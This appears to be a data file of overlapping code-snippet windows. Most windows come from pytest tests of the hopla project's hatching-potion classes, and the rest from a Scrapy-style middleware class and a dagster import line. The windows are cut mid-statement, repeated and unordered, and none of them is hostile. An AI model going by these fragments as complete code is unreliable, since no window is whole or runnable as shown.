"from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import"
] |
[
"class SpiderMiddleware(object): def process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self,",
"SpiderMiddleware(object): def process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self, response):",
"在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self, response): # 用于处理响应数据: 在响应对象交给爬虫之前调用 print(\"SpiderMiddleware-process_response-{}\".format(response.url)) return response",
"用于对请求和响应数据进行预处理 class SpiderMiddleware(object): def process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def",
"# 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self, response): # 用于处理响应数据: 在响应对象交给爬虫之前调用 print(\"SpiderMiddleware-process_response-{}\".format(response.url))",
"下载器中间件模块: 用于对请求和响应数据进行预处理 class SpiderMiddleware(object): def process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request",
"用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self, response): # 用于处理响应数据: 在响应对象交给爬虫之前调用 print(\"SpiderMiddleware-process_response-{}\".format(response.url)) return",
"def process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self, response): #",
"# 下载器中间件模块: 用于对请求和响应数据进行预处理 class SpiderMiddleware(object): def process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return",
"process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self, response): # 用于处理响应数据:",
"request): # 用于处理请求的: 在请求对象交给引擎之前调用 print(\"SpiderMiddleware-process_request-{}\".format(request.url)) return request def process_response(self, response): # 用于处理响应数据: 在响应对象交给爬虫之前调用"
] |
[
"0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name:",
"!= HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1),",
"= HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert",
"HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1,",
"= iter(collection) assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) ==",
"\"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\":",
"== HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0)",
"collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1)",
"next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ =",
"0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0)",
"1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\":",
"(\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int):",
"assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10),",
"test_is_standard_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True",
"range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity)",
"potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert",
"== f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) ==",
"quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity =",
"test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert",
"= \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in",
"def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3,",
"0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name,",
"list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert",
"List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData",
"quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2,",
"is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\",",
"HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def",
"potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [",
"2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator =",
"\"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\":",
"!= HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self,",
"assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\",",
"a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE,",
"= HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left",
"HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self):",
") def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str",
"pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2, quantity2",
"potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1),",
"List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3)",
"quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3",
"str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\",",
"quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1,",
"\"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity",
"0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert",
"HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\",",
"= HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection()",
"potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3:",
"[ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity:",
"collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\",",
"potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert",
"from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE =",
"def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) == 0",
"hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) )",
"_ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2, quantity2 =",
"collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg",
"[ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42),",
"result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3,",
"(\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion =",
"(\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\",",
"next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"]",
"HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity",
"potion3: quantity3 }) generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator)",
"assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class",
"assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name:",
"== \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection =",
"10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection =",
"HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name:",
"potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert",
"potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection =",
"test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False",
"HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def",
"== expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity =",
"assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ])",
"repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert",
"assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\",",
"(\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self,",
"(\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity)",
"= HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def",
"quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1,",
"quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1",
"def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1",
"potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def",
"== HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert",
"def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\":",
"as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the collection \" assert",
"10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int): potion",
"assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _",
"assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\":",
"assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\",",
"assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\",",
"TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert",
"potion2: quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1)",
"collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self):",
"_SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as",
"is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\",",
"collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\": 0,",
"1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) !=",
"== HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 =",
"== HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2, quantity2 =",
"class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1)",
"\"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\"))",
"exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the collection \" assert str(exec_info.value).startswith(expected_msg)",
"True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def",
"assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection()",
"collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity",
"potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection:",
"@pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int):",
"HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is",
"def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info:",
"== HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [",
"test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False",
"42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\" assert next(iterator) ==",
"0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert",
"potion1, quantity1 = \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 =",
"= \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1,",
"collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] =",
"= HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert",
"f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\")",
"HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected:",
"\"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert",
"pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion",
"quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\":",
"import random from typing import List import click import pytest from hopla.hoplalib.errors import",
"result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity",
"quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with",
"range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info:",
"def test_is_standard_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is",
"= [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected",
"from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def",
"HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42,",
"int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result == f\"HatchPotion({potion_name}:",
"= HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict",
"potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\",",
"#!/usr/bin/env python3 import random from typing import List import click import pytest from",
"as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize(",
"= \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity })",
"assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self):",
"expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result",
"False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert",
"potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1),",
"= next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2, quantity2 = \"Sunshine\",",
"collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2, quantity2",
"from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection,",
"HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def",
"iter(collection) assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\"",
"assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity -",
"@pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int):",
"\"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion",
"right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2})",
"HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2})",
"HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1})",
"test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3",
"quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))",
"0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"]",
"== HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2})",
"1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was",
"HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42,",
"= HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg =",
"== 0 def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection",
"int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert",
"HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self):",
"] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42",
"quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] =",
"1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name,",
"potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({",
"HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion:",
"(\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ])",
"- 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException)",
"{quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert",
"is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({})",
"click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels",
